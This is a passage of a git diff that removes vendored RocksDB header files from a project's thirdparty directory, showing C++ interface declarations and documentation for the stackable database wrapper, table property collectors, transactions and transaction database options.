-  using DB::GetMapProperty;
-  using DB::GetProperty;
-  virtual bool GetProperty(ColumnFamilyHandle* column_family,
-                           const Slice& property, std::string* value) override {
-    return db_->GetProperty(column_family, property, value);
-  }
-  virtual bool GetMapProperty(ColumnFamilyHandle* column_family,
-                              const Slice& property,
-                              std::map<std::string, double>* value) override {
-    return db_->GetMapProperty(column_family, property, value);
-  }
-
-  using DB::GetIntProperty;
-  virtual bool GetIntProperty(ColumnFamilyHandle* column_family,
-                              const Slice& property, uint64_t* value) override {
-    return db_->GetIntProperty(column_family, property, value);
-  }
-
-  using DB::GetAggregatedIntProperty;
-  virtual bool GetAggregatedIntProperty(const Slice& property,
-                                        uint64_t* value) override {
-    return db_->GetAggregatedIntProperty(property, value);
-  }
-
-  using DB::GetApproximateSizes;
-  virtual void GetApproximateSizes(ColumnFamilyHandle* column_family,
-                                   const Range* r, int n, uint64_t* sizes,
-                                   uint8_t include_flags
-                                   = INCLUDE_FILES) override {
-    return db_->GetApproximateSizes(column_family, r, n, sizes,
-                                    include_flags);
-  }
-
-  using DB::GetApproximateMemTableStats;
-  virtual void GetApproximateMemTableStats(ColumnFamilyHandle* column_family,
-                                           const Range& range,
-                                           uint64_t* const count,
-                                           uint64_t* const size) override {
-    return db_->GetApproximateMemTableStats(column_family, range, count, size);
-  }
-
-  using DB::CompactRange;
-  virtual Status CompactRange(const CompactRangeOptions& options,
-                              ColumnFamilyHandle* column_family,
-                              const Slice* begin, const Slice* end) override {
-    return db_->CompactRange(options, column_family, begin, end);
-  }
-
-  using DB::CompactFiles;
-  virtual Status CompactFiles(
-      const CompactionOptions& compact_options,
-      ColumnFamilyHandle* column_family,
-      const std::vector<std::string>& input_file_names,
-      const int output_level, const int output_path_id = -1) override {
-    return db_->CompactFiles(
-        compact_options, column_family, input_file_names,
-        output_level, output_path_id);
-  }
-
-  virtual Status PauseBackgroundWork() override {
-    return db_->PauseBackgroundWork();
-  }
-  virtual Status ContinueBackgroundWork() override {
-    return db_->ContinueBackgroundWork();
-  }
-
-  virtual Status EnableAutoCompaction(
-      const std::vector<ColumnFamilyHandle*>& column_family_handles) override {
-    return db_->EnableAutoCompaction(column_family_handles);
-  }
-
-  using DB::NumberLevels;
-  virtual int NumberLevels(ColumnFamilyHandle* column_family) override {
-    return db_->NumberLevels(column_family);
-  }
-
-  using DB::MaxMemCompactionLevel;
-  virtual int MaxMemCompactionLevel(ColumnFamilyHandle* column_family)
-      override {
-    return db_->MaxMemCompactionLevel(column_family);
-  }
-
-  using DB::Level0StopWriteTrigger;
-  virtual int Level0StopWriteTrigger(ColumnFamilyHandle* column_family)
-      override {
-    return db_->Level0StopWriteTrigger(column_family);
-  }
-
-  virtual const std::string& GetName() const override {
-    return db_->GetName();
-  }
-
-  virtual Env* GetEnv() const override {
-    return db_->GetEnv();
-  }
-
-  using DB::GetOptions;
-  virtual Options GetOptions(ColumnFamilyHandle* column_family) const override {
-    return db_->GetOptions(column_family);
-  }
-
-  using DB::GetDBOptions;
-  virtual DBOptions GetDBOptions() const override {
-    return db_->GetDBOptions();
-  }
-
-  using DB::Flush;
-  virtual Status Flush(const FlushOptions& fopts,
-                       ColumnFamilyHandle* column_family) override {
-    return db_->Flush(fopts, column_family);
-  }
-
-  virtual Status SyncWAL() override {
-    return db_->SyncWAL();
-  }
-
-  virtual Status FlushWAL(bool sync) override { return db_->FlushWAL(sync); }
-
-#ifndef ROCKSDB_LITE
-
-  virtual Status DisableFileDeletions() override {
-    return db_->DisableFileDeletions();
-  }
-
-  virtual Status EnableFileDeletions(bool force) override {
-    return db_->EnableFileDeletions(force);
-  }
-
-  virtual void GetLiveFilesMetaData(
-      std::vector<LiveFileMetaData>* metadata) override {
-    db_->GetLiveFilesMetaData(metadata);
-  }
-
-  virtual void GetColumnFamilyMetaData(
-      ColumnFamilyHandle *column_family,
-      ColumnFamilyMetaData* cf_meta) override {
-    db_->GetColumnFamilyMetaData(column_family, cf_meta);
-  }
-
-#endif  // ROCKSDB_LITE
-
-  virtual Status GetLiveFiles(std::vector<std::string>& vec, uint64_t* mfs,
-                              bool flush_memtable = true) override {
-      return db_->GetLiveFiles(vec, mfs, flush_memtable);
-  }
-
-  virtual SequenceNumber GetLatestSequenceNumber() const override {
-    return db_->GetLatestSequenceNumber();
-  }
-
-  virtual Status GetSortedWalFiles(VectorLogPtr& files) override {
-    return db_->GetSortedWalFiles(files);
-  }
-
-  virtual Status DeleteFile(std::string name) override {
-    return db_->DeleteFile(name);
-  }
-
-  virtual Status GetDbIdentity(std::string& identity) const override {
-    return db_->GetDbIdentity(identity);
-  }
-
-  using DB::SetOptions;
-  virtual Status SetOptions(ColumnFamilyHandle* column_family_handle,
-                            const std::unordered_map<std::string, std::string>&
-                                new_options) override {
-    return db_->SetOptions(column_family_handle, new_options);
-  }
-
-  virtual Status SetDBOptions(
-      const std::unordered_map<std::string, std::string>& new_options)
-      override {
-    return db_->SetDBOptions(new_options);
-  }
-
-  using DB::ResetStats;
-  virtual Status ResetStats() override { return db_->ResetStats(); }
-
-  using DB::GetPropertiesOfAllTables;
-  virtual Status GetPropertiesOfAllTables(
-      ColumnFamilyHandle* column_family,
-      TablePropertiesCollection* props) override {
-    return db_->GetPropertiesOfAllTables(column_family, props);
-  }
-
-  using DB::GetPropertiesOfTablesInRange;
-  virtual Status GetPropertiesOfTablesInRange(
-      ColumnFamilyHandle* column_family, const Range* range, std::size_t n,
-      TablePropertiesCollection* props) override {
-    return db_->GetPropertiesOfTablesInRange(column_family, range, n, props);
-  }
-
-  virtual Status GetUpdatesSince(
-      SequenceNumber seq_number, unique_ptr<TransactionLogIterator>* iter,
-      const TransactionLogIterator::ReadOptions& read_options) override {
-    return db_->GetUpdatesSince(seq_number, iter, read_options);
-  }
-
-  virtual Status SuggestCompactRange(ColumnFamilyHandle* column_family,
-                                     const Slice* begin,
-                                     const Slice* end) override {
-    return db_->SuggestCompactRange(column_family, begin, end);
-  }
-
-  virtual Status PromoteL0(ColumnFamilyHandle* column_family,
-                           int target_level) override {
-    return db_->PromoteL0(column_family, target_level);
-  }
-
-  virtual ColumnFamilyHandle* DefaultColumnFamily() const override {
-    return db_->DefaultColumnFamily();
-  }
-
- protected:
-  DB* db_;
-};
-
-} //  namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/table_properties_collectors.h b/thirdparty/rocksdb/include/rocksdb/utilities/table_properties_collectors.h
deleted file mode 100644
index 0f88270..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/table_properties_collectors.h
+++ /dev/null
@@ -1,29 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-#include <memory>
-
-#include "rocksdb/table_properties.h"
-
-namespace rocksdb {
-
-// Creates a factory of a table property collector that marks a SST
-// file as need-compaction when it observe at least "D" deletion
-// entries in any "N" consecutive entires.
-//
-// @param sliding_window_size "N". Note that this number will be
-//     round up to the smallest multiple of 128 that is no less
-//     than the specified size.
-// @param deletion_trigger "D".  Note that even when "N" is changed,
-//     the specified number for "D" will not be changed.
-extern std::shared_ptr<TablePropertiesCollectorFactory>
-    NewCompactOnDeletionCollectorFactory(
-        size_t sliding_window_size,
-        size_t deletion_trigger);
-}  // namespace rocksdb
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/transaction.h b/thirdparty/rocksdb/include/rocksdb/utilities/transaction.h
deleted file mode 100644
index a351973..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/transaction.h
+++ /dev/null
@@ -1,479 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <string>
-#include <vector>
-
-#include "rocksdb/comparator.h"
-#include "rocksdb/db.h"
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-class Iterator;
-class TransactionDB;
-class WriteBatchWithIndex;
-
-using TransactionName = std::string;
-
-using TransactionID = uint64_t;
-
-// Provides notification to the caller of SetSnapshotOnNextOperation when
-// the actual snapshot gets created
-class TransactionNotifier {
- public:
-  virtual ~TransactionNotifier() {}
-
-  // Implement this method to receive notification when a snapshot is
-  // requested via SetSnapshotOnNextOperation.
-  virtual void SnapshotCreated(const Snapshot* newSnapshot) = 0;
-};
-
-// Provides BEGIN/COMMIT/ROLLBACK transactions.
-//
-// To use transactions, you must first create either an OptimisticTransactionDB
-// or a TransactionDB.  See examples/[optimistic_]transaction_example.cc for
-// more information.
-//
-// To create a transaction, use [Optimistic]TransactionDB::BeginTransaction().
-//
-// It is up to the caller to synchronize access to this object.
-//
-// See examples/transaction_example.cc for some simple examples.
-//
-// TODO(agiardullo): Not yet implemented
-//  -PerfContext statistics
-//  -Support for using Transactions with DBWithTTL
-class Transaction {
- public:
-  virtual ~Transaction() {}
-
-  // If a transaction has a snapshot set, the transaction will ensure that
-  // any keys successfully written(or fetched via GetForUpdate()) have not
-  // been modified outside of this transaction since the time the snapshot was
-  // set.
-  // If a snapshot has not been set, the transaction guarantees that keys have
-  // not been modified since the time each key was first written (or fetched via
-  // GetForUpdate()).
-  //
-  // Using SetSnapshot() will provide stricter isolation guarantees at the
-  // expense of potentially more transaction failures due to conflicts with
-  // other writes.
-  //
-  // Calling SetSnapshot() has no effect on keys written before this function
-  // has been called.
-  //
-  // SetSnapshot() may be called multiple times if you would like to change
-  // the snapshot used for different operations in this transaction.
-  //
-  // Calling SetSnapshot will not affect the version of Data returned by Get()
-  // methods.  See Transaction::Get() for more details.
-  virtual void SetSnapshot() = 0;
-
-  // Similar to SetSnapshot(), but will not change the current snapshot
-  // until Put/Merge/Delete/GetForUpdate/MultigetForUpdate is called.
-  // By calling this function, the transaction will essentially call
-  // SetSnapshot() for you right before performing the next write/GetForUpdate.
-  //
-  // Calling SetSnapshotOnNextOperation() will not affect what snapshot is
-  // returned by GetSnapshot() until the next write/GetForUpdate is executed.
-  //
-  // When the snapshot is created the notifier's SnapshotCreated method will
-  // be called so that the caller can get access to the snapshot.
-  //
-  // This is an optimization to reduce the likelihood of conflicts that
-  // could occur in between the time SetSnapshot() is called and the first
-  // write/GetForUpdate operation.  Eg, this prevents the following
-  // race-condition:
-  //
-  //   txn1->SetSnapshot();
-  //                             txn2->Put("A", ...);
-  //                             txn2->Commit();
-  //   txn1->GetForUpdate(opts, "A", ...);  // FAIL!
-  virtual void SetSnapshotOnNextOperation(
-      std::shared_ptr<TransactionNotifier> notifier = nullptr) = 0;
-
-  // Returns the Snapshot created by the last call to SetSnapshot().
-  //
-  // REQUIRED: The returned Snapshot is only valid up until the next time
-  // SetSnapshot()/SetSnapshotOnNextSavePoint() is called, ClearSnapshot()
-  // is called, or the Transaction is deleted.
-  virtual const Snapshot* GetSnapshot() const = 0;
-
-  // Clears the current snapshot (i.e. no snapshot will be 'set')
-  //
-  // This removes any snapshot that currently exists or is set to be created
-  // on the next update operation (SetSnapshotOnNextOperation).
-  //
-  // Calling ClearSnapshot() has no effect on keys written before this function
-  // has been called.
-  //
-  // If a reference to a snapshot was retrieved via GetSnapshot(), it will no
-  // longer be valid and should be discarded after a call to ClearSnapshot().
-  virtual void ClearSnapshot() = 0;
-
-  // Prepare the current transation for 2PC
-  virtual Status Prepare() = 0;
-
-  // Write all batched keys to the db atomically.
-  //
-  // Returns OK on success.
-  //
-  // May return any error status that could be returned by DB:Write().
-  //
-  // If this transaction was created by an OptimisticTransactionDB(),
-  // Status::Busy() may be returned if the transaction could not guarantee
-  // that there are no write conflicts.  Status::TryAgain() may be returned
-  // if the memtable history size is not large enough
-  //  (See max_write_buffer_number_to_maintain).
-  //
-  // If this transaction was created by a TransactionDB(), Status::Expired()
-  // may be returned if this transaction has lived for longer than
-  // TransactionOptions.expiration.
-  virtual Status Commit() = 0;
-
-  // Discard all batched writes in this transaction.
-  virtual Status Rollback() = 0;
-
-  // Records the state of the transaction for future calls to
-  // RollbackToSavePoint().  May be called multiple times to set multiple save
-  // points.
-  virtual void SetSavePoint() = 0;
-
-  // Undo all operations in this transaction (Put, Merge, Delete, PutLogData)
-  // since the most recent call to SetSavePoint() and removes the most recent
-  // SetSavePoint().
-  // If there is no previous call to SetSavePoint(), returns Status::NotFound()
-  virtual Status RollbackToSavePoint() = 0;
-
-  // This function is similar to DB::Get() except it will also read pending
-  // changes in this transaction.  Currently, this function will return
-  // Status::MergeInProgress if the most recent write to the queried key in
-  // this batch is a Merge.
-  //
-  // If read_options.snapshot is not set, the current version of the key will
-  // be read.  Calling SetSnapshot() does not affect the version of the data
-  // returned.
-  //
-  // Note that setting read_options.snapshot will affect what is read from the
-  // DB but will NOT change which keys are read from this transaction (the keys
-  // in this transaction do not yet belong to any snapshot and will be fetched
-  // regardless).
-  virtual Status Get(const ReadOptions& options,
-                     ColumnFamilyHandle* column_family, const Slice& key,
-                     std::string* value) = 0;
-
-  // An overload of the the above method that receives a PinnableSlice
-  // For backward compatiblity a default implementation is provided
-  virtual Status Get(const ReadOptions& options,
-                     ColumnFamilyHandle* column_family, const Slice& key,
-                     PinnableSlice* pinnable_val) {
-    assert(pinnable_val != nullptr);
-    auto s = Get(options, column_family, key, pinnable_val->GetSelf());
-    pinnable_val->PinSelf();
-    return s;
-  }
-
-  virtual Status Get(const ReadOptions& options, const Slice& key,
-                     std::string* value) = 0;
-  virtual Status Get(const ReadOptions& options, const Slice& key,
-                     PinnableSlice* pinnable_val) {
-    assert(pinnable_val != nullptr);
-    auto s = Get(options, key, pinnable_val->GetSelf());
-    pinnable_val->PinSelf();
-    return s;
-  }
-
-  virtual std::vector<Status> MultiGet(
-      const ReadOptions& options,
-      const std::vector<ColumnFamilyHandle*>& column_family,
-      const std::vector<Slice>& keys, std::vector<std::string>* values) = 0;
-
-  virtual std::vector<Status> MultiGet(const ReadOptions& options,
-                                       const std::vector<Slice>& keys,
-                                       std::vector<std::string>* values) = 0;
-
-  // Read this key and ensure that this transaction will only
-  // be able to be committed if this key is not written outside this
-  // transaction after it has first been read (or after the snapshot if a
-  // snapshot is set in this transaction).  The transaction behavior is the
-  // same regardless of whether the key exists or not.
-  //
-  // Note: Currently, this function will return Status::MergeInProgress
-  // if the most recent write to the queried key in this batch is a Merge.
-  //
-  // The values returned by this function are similar to Transaction::Get().
-  // If value==nullptr, then this function will not read any data, but will
-  // still ensure that this key cannot be written to by outside of this
-  // transaction.
-  //
-  // If this transaction was created by an OptimisticTransaction, GetForUpdate()
-  // could cause commit() to fail.  Otherwise, it could return any error
-  // that could be returned by DB::Get().
-  //
-  // If this transaction was created by a TransactionDB, it can return
-  // Status::OK() on success,
-  // Status::Busy() if there is a write conflict,
-  // Status::TimedOut() if a lock could not be acquired,
-  // Status::TryAgain() if the memtable history size is not large enough
-  //  (See max_write_buffer_number_to_maintain)
-  // Status::MergeInProgress() if merge operations cannot be resolved.
-  // or other errors if this key could not be read.
-  virtual Status GetForUpdate(const ReadOptions& options,
-                              ColumnFamilyHandle* column_family,
-                              const Slice& key, std::string* value,
-                              bool exclusive = true) = 0;
-
-  // An overload of the the above method that receives a PinnableSlice
-  // For backward compatiblity a default implementation is provided
-  virtual Status GetForUpdate(const ReadOptions& options,
-                              ColumnFamilyHandle* column_family,
-                              const Slice& key, PinnableSlice* pinnable_val,
-                              bool exclusive = true) {
-    if (pinnable_val == nullptr) {
-      std::string* null_str = nullptr;
-      return GetForUpdate(options, key, null_str);
-    } else {
-      auto s = GetForUpdate(options, key, pinnable_val->GetSelf());
-      pinnable_val->PinSelf();
-      return s;
-    }
-  }
-
-  virtual Status GetForUpdate(const ReadOptions& options, const Slice& key,
-                              std::string* value, bool exclusive = true) = 0;
-
-  virtual std::vector<Status> MultiGetForUpdate(
-      const ReadOptions& options,
-      const std::vector<ColumnFamilyHandle*>& column_family,
-      const std::vector<Slice>& keys, std::vector<std::string>* values) = 0;
-
-  virtual std::vector<Status> MultiGetForUpdate(
-      const ReadOptions& options, const std::vector<Slice>& keys,
-      std::vector<std::string>* values) = 0;
-
-  // Returns an iterator that will iterate on all keys in the default
-  // column family including both keys in the DB and uncommitted keys in this
-  // transaction.
-  //
-  // Setting read_options.snapshot will affect what is read from the
-  // DB but will NOT change which keys are read from this transaction (the keys
-  // in this transaction do not yet belong to any snapshot and will be fetched
-  // regardless).
-  //
-  // Caller is responsible for deleting the returned Iterator.
-  //
-  // The returned iterator is only valid until Commit(), Rollback(), or
-  // RollbackToSavePoint() is called.
-  virtual Iterator* GetIterator(const ReadOptions& read_options) = 0;
-
-  virtual Iterator* GetIterator(const ReadOptions& read_options,
-                                ColumnFamilyHandle* column_family) = 0;
-
-  // Put, Merge, Delete, and SingleDelete behave similarly to the corresponding
-  // functions in WriteBatch, but will also do conflict checking on the
-  // keys being written.
-  //
-  // If this Transaction was created on an OptimisticTransactionDB, these
-  // functions should always return Status::OK().
-  //
-  // If this Transaction was created on a TransactionDB, the status returned
-  // can be:
-  // Status::OK() on success,
-  // Status::Busy() if there is a write conflict,
-  // Status::TimedOut() if a lock could not be acquired,
-  // Status::TryAgain() if the memtable history size is not large enough
-  //  (See max_write_buffer_number_to_maintain)
-  // or other errors on unexpected failures.
-  virtual Status Put(ColumnFamilyHandle* column_family, const Slice& key,
-                     const Slice& value) = 0;
-  virtual Status Put(const Slice& key, const Slice& value) = 0;
-  virtual Status Put(ColumnFamilyHandle* column_family, const SliceParts& key,
-                     const SliceParts& value) = 0;
-  virtual Status Put(const SliceParts& key, const SliceParts& value) = 0;
-
-  virtual Status Merge(ColumnFamilyHandle* column_family, const Slice& key,
-                       const Slice& value) = 0;
-  virtual Status Merge(const Slice& key, const Slice& value) = 0;
-
-  virtual Status Delete(ColumnFamilyHandle* column_family,
-                        const Slice& key) = 0;
-  virtual Status Delete(const Slice& key) = 0;
-  virtual Status Delete(ColumnFamilyHandle* column_family,
-                        const SliceParts& key) = 0;
-  virtual Status Delete(const SliceParts& key) = 0;
-
-  virtual Status SingleDelete(ColumnFamilyHandle* column_family,
-                              const Slice& key) = 0;
-  virtual Status SingleDelete(const Slice& key) = 0;
-  virtual Status SingleDelete(ColumnFamilyHandle* column_family,
-                              const SliceParts& key) = 0;
-  virtual Status SingleDelete(const SliceParts& key) = 0;
-
-  // PutUntracked() will write a Put to the batch of operations to be committed
-  // in this transaction.  This write will only happen if this transaction
-  // gets committed successfully.  But unlike Transaction::Put(),
-  // no conflict checking will be done for this key.
-  //
-  // If this Transaction was created on a TransactionDB, this function will
-  // still acquire locks necessary to make sure this write doesn't cause
-  // conflicts in other transactions and may return Status::Busy().
-  virtual Status PutUntracked(ColumnFamilyHandle* column_family,
-                              const Slice& key, const Slice& value) = 0;
-  virtual Status PutUntracked(const Slice& key, const Slice& value) = 0;
-  virtual Status PutUntracked(ColumnFamilyHandle* column_family,
-                              const SliceParts& key,
-                              const SliceParts& value) = 0;
-  virtual Status PutUntracked(const SliceParts& key,
-                              const SliceParts& value) = 0;
-
-  virtual Status MergeUntracked(ColumnFamilyHandle* column_family,
-                                const Slice& key, const Slice& value) = 0;
-  virtual Status MergeUntracked(const Slice& key, const Slice& value) = 0;
-
-  virtual Status DeleteUntracked(ColumnFamilyHandle* column_family,
-                                 const Slice& key) = 0;
-
-  virtual Status DeleteUntracked(const Slice& key) = 0;
-  virtual Status DeleteUntracked(ColumnFamilyHandle* column_family,
-                                 const SliceParts& key) = 0;
-  virtual Status DeleteUntracked(const SliceParts& key) = 0;
-
-  // Similar to WriteBatch::PutLogData
-  virtual void PutLogData(const Slice& blob) = 0;
-
-  // By default, all Put/Merge/Delete operations will be indexed in the
-  // transaction so that Get/GetForUpdate/GetIterator can search for these
-  // keys.
-  //
-  // If the caller does not want to fetch the keys about to be written,
-  // they may want to avoid indexing as a performance optimization.
-  // Calling DisableIndexing() will turn off indexing for all future
-  // Put/Merge/Delete operations until EnableIndexing() is called.
-  //
-  // If a key is Put/Merge/Deleted after DisableIndexing is called and then
-  // is fetched via Get/GetForUpdate/GetIterator, the result of the fetch is
-  // undefined.
-  virtual void DisableIndexing() = 0;
-  virtual void EnableIndexing() = 0;
-
-  // Returns the number of distinct Keys being tracked by this transaction.
-  // If this transaction was created by a TransactinDB, this is the number of
-  // keys that are currently locked by this transaction.
-  // If this transaction was created by an OptimisticTransactionDB, this is the
-  // number of keys that need to be checked for conflicts at commit time.
-  virtual uint64_t GetNumKeys() const = 0;
-
-  // Returns the number of Puts/Deletes/Merges that have been applied to this
-  // transaction so far.
-  virtual uint64_t GetNumPuts() const = 0;
-  virtual uint64_t GetNumDeletes() const = 0;
-  virtual uint64_t GetNumMerges() const = 0;
-
-  // Returns the elapsed time in milliseconds since this Transaction began.
-  virtual uint64_t GetElapsedTime() const = 0;
-
-  // Fetch the underlying write batch that contains all pending changes to be
-  // committed.
-  //
-  // Note:  You should not write or delete anything from the batch directly and
-  // should only use the functions in the Transaction class to
-  // write to this transaction.
-  virtual WriteBatchWithIndex* GetWriteBatch() = 0;
-
-  // Change the value of TransactionOptions.lock_timeout (in milliseconds) for
-  // this transaction.
-  // Has no effect on OptimisticTransactions.
-  virtual void SetLockTimeout(int64_t timeout) = 0;
-
-  // Return the WriteOptions that will be used during Commit()
-  virtual WriteOptions* GetWriteOptions() = 0;
-
-  // Reset the WriteOptions that will be used during Commit().
-  virtual void SetWriteOptions(const WriteOptions& write_options) = 0;
-
-  // If this key was previously fetched in this transaction using
-  // GetForUpdate/MultigetForUpdate(), calling UndoGetForUpdate will tell
-  // the transaction that it no longer needs to do any conflict checking
-  // for this key.
-  //
-  // If a key has been fetched N times via GetForUpdate/MultigetForUpdate(),
-  // then UndoGetForUpdate will only have an effect if it is also called N
-  // times.  If this key has been written to in this transaction,
-  // UndoGetForUpdate() will have no effect.
-  //
-  // If SetSavePoint() has been called after the GetForUpdate(),
-  // UndoGetForUpdate() will not have any effect.
-  //
-  // If this Transaction was created by an OptimisticTransactionDB,
-  // calling UndoGetForUpdate can affect whether this key is conflict checked
-  // at commit time.
-  // If this Transaction was created by a TransactionDB,
-  // calling UndoGetForUpdate may release any held locks for this key.
-  virtual void UndoGetForUpdate(ColumnFamilyHandle* column_family,
-                                const Slice& key) = 0;
-  virtual void UndoGetForUpdate(const Slice& key) = 0;
-
-  virtual Status RebuildFromWriteBatch(WriteBatch* src_batch) = 0;
-
-  virtual WriteBatch* GetCommitTimeWriteBatch() = 0;
-
-  virtual void SetLogNumber(uint64_t log) { log_number_ = log; }
-
-  virtual uint64_t GetLogNumber() const { return log_number_; }
-
-  virtual Status SetName(const TransactionName& name) = 0;
-
-  virtual TransactionName GetName() const { return name_; }
-
-  virtual TransactionID GetID() const { return 0; }
-
-  virtual bool IsDeadlockDetect() const { return false; }
-
-  virtual std::vector<TransactionID> GetWaitingTxns(uint32_t* column_family_id,
-                                                    std::string* key) const {
-    assert(false);
-    return std::vector<TransactionID>();
-  }
-
-  enum TransactionState {
-    STARTED = 0,
-    AWAITING_PREPARE = 1,
-    PREPARED = 2,
-    AWAITING_COMMIT = 3,
-    COMMITED = 4,
-    AWAITING_ROLLBACK = 5,
-    ROLLEDBACK = 6,
-    LOCKS_STOLEN = 7,
-  };
-
-  TransactionState GetState() const { return txn_state_; }
-  void SetState(TransactionState state) { txn_state_ = state; }
-
- protected:
-  explicit Transaction(const TransactionDB* db) {}
-  Transaction() {}
-
-  // the log in which the prepared section for this txn resides
-  // (for two phase commit)
-  uint64_t log_number_;
-  TransactionName name_;
-
-  // Execution status of the transaction.
-  std::atomic<TransactionState> txn_state_;
-
- private:
-  // No copying allowed
-  Transaction(const Transaction&);
-  void operator=(const Transaction&);
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/transaction_db.h b/thirdparty/rocksdb/include/rocksdb/utilities/transaction_db.h
deleted file mode 100644
index 7704389..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/transaction_db.h
+++ /dev/null
@@ -1,226 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include <string>
-#include <utility>
-#include <vector>
-
-#include "rocksdb/comparator.h"
-#include "rocksdb/db.h"
-#include "rocksdb/utilities/stackable_db.h"
-#include "rocksdb/utilities/transaction.h"
-
-// Database with Transaction support.
-//
-// See transaction.h and examples/transaction_example.cc
-
-namespace rocksdb {
-
-class TransactionDBMutexFactory;
-
-enum TxnDBWritePolicy {
-  WRITE_COMMITTED = 0,  // write only the committed data
-  // TODO(myabandeh): Not implemented yet
-  WRITE_PREPARED,  // write data after the prepare phase of 2pc
-  // TODO(myabandeh): Not implemented yet
-  WRITE_UNPREPARED  // write data before the prepare phase of 2pc
-};
-
-const uint32_t kInitialMaxDeadlocks = 5;
-
-struct TransactionDBOptions {
-  // Specifies the maximum number of keys that can be locked at the same time
-  // per column family.
-  // If the number of locked keys is greater than max_num_locks, transaction
-  // writes (or GetForUpdate) will return an error.
-  // If this value is not positive, no limit will be enforced.
-  int64_t max_num_locks = -1;
-
-  // Stores the number of latest deadlocks to track
-  uint32_t max_num_deadlocks = kInitialMaxDeadlocks;
-
-  // Increasing this value will increase the concurrency by dividing the lock
-  // table (per column family) into more sub-tables, each with their own
-  // separate
-  // mutex.
-  size_t num_stripes = 16;
-
-  // If positive, specifies the default wait timeout in milliseconds when
-  // a transaction attempts to lock a key if not specified by
-  // TransactionOptions::lock_timeout.
-  //
-  // If 0, no waiting is done if a lock cannot instantly be acquired.
-  // If negative, there is no timeout.  Not using a timeout is not recommended
-  // as it can lead to deadlocks.  Currently, there is no deadlock-detection to
-  // recover
-  // from a deadlock.
-  int64_t transaction_lock_timeout = 1000;  // 1 second
-
-  // If positive, specifies the wait timeout in milliseconds when writing a key
-  // OUTSIDE of a transaction (ie by calling DB::Put(),Merge(),Delete(),Write()
-  // directly).
-  // If 0, no waiting is done if a lock cannot instantly be acquired.
-  // If negative, there is no timeout and will block indefinitely when acquiring
-  // a lock.
-  //
-  // Not using a timeout can lead to deadlocks.  Currently, there
-  // is no deadlock-detection to recover from a deadlock.  While DB writes
-  // cannot deadlock with other DB writes, they can deadlock with a transaction.
-  // A negative timeout should only be used if all transactions have a small
-  // expiration set.
-  int64_t default_lock_timeout = 1000;  // 1 second
-
-  // If set, the TransactionDB will use this implemenation of a mutex and
-  // condition variable for all transaction locking instead of the default
-  // mutex/condvar implementation.
-  std::shared_ptr<TransactionDBMutexFactory> custom_mutex_factory;
-
-  // The policy for when to write the data into the DB. The default policy is to
-  // write only the committed data (WRITE_COMMITTED). The data could be written
-  // before the commit phase. The DB then needs to provide the mechanisms to
-  // tell apart committed from uncommitted data.
-  TxnDBWritePolicy write_policy = TxnDBWritePolicy::WRITE_COMMITTED;
-};
-
-struct TransactionOptions {
-  // Setting set_snapshot=true is the same as calling
-  // Transaction::SetSnapshot().
-  bool set_snapshot = false;
-
-  // Setting to true means that before acquiring locks, this transaction will
-  // check if doing so will cause a deadlock. If so, it will return with
-  // Status::Busy.  The user should retry their transaction.
-  bool deadlock_detect = false;
-
-  // TODO(agiardullo): TransactionDB does not yet support comparators that allow
-  // two non-equal keys to be equivalent.  Ie, cmp->Compare(a,b) should only
-  // return 0 if
-  // a.compare(b) returns 0.
-
-
-  // If positive, specifies the wait timeout in milliseconds when
-  // a transaction attempts to lock a key.
-  //
-  // If 0, no waiting is done if a lock cannot instantly be acquired.
-  // If negative, TransactionDBOptions::transaction_lock_timeout will be used.
-  int64_t lock_timeout = -1;
-
-  // Expiration duration in milliseconds.  If non-negative, transactions that
-  // last longer than this many milliseconds will fail to commit.  If not set,
-  // a forgotten transaction that is never committed, rolled back, or deleted
-  // will never relinquish any locks it holds.  This could prevent keys from
-  // being written by other writers.
-  int64_t expiration = -1;
-
-  // The number of traversals to make during deadlock detection.
-  int64_t deadlock_detect_depth = 50;
-
-  // The maximum number of bytes used for the write batch. 0 means no limit.
-  size_t max_write_batch_size = 0;
-};
-
-struct KeyLockInfo {
-  std::string key;
-  std::vector<TransactionID> ids;
-  bool exclusive;
-};
-
-struct DeadlockInfo {
-  TransactionID m_txn_id;
-  uint32_t m_cf_id;
-  std::string m_waiting_key;
-  bool m_exclusive;
-};
-
-struct DeadlockPath {
-  std::vector<DeadlockInfo> path;
-  bool limit_exceeded;
-
-  explicit DeadlockPath(std::vector<DeadlockInfo> path_entry)
-      : path(path_entry), limit_exceeded(false) {}
-
-  // empty path, limit exceeded constructor and default constructor
-  explicit DeadlockPath(bool limit = false) : path(0), limit_exceeded(limit) {}
-
-  bool empty() { return path.empty() && !limit_exceeded; }
-};
-
-class TransactionDB : public StackableDB {
- public:
-  // Open a TransactionDB similar to DB::Open().
-  // Internally call PrepareWrap() and WrapDB()
-  static Status Open(const Options& options,
-                     const TransactionDBOptions& txn_db_options,
-                     const std::string& dbname, TransactionDB** dbptr);
-
-  static Status Open(const DBOptions& db_options,
-                     const TransactionDBOptions& txn_db_options,
-                     const std::string& dbname,
-                     const std::vector<ColumnFamilyDescriptor>& column_families,
-                     std::vector<ColumnFamilyHandle*>* handles,
-                     TransactionDB** dbptr);
-  // The following functions are used to open a TransactionDB internally using
-  // an opened DB or StackableDB.
-  // 1. Call prepareWrap(), passing an empty std::vector<size_t> to
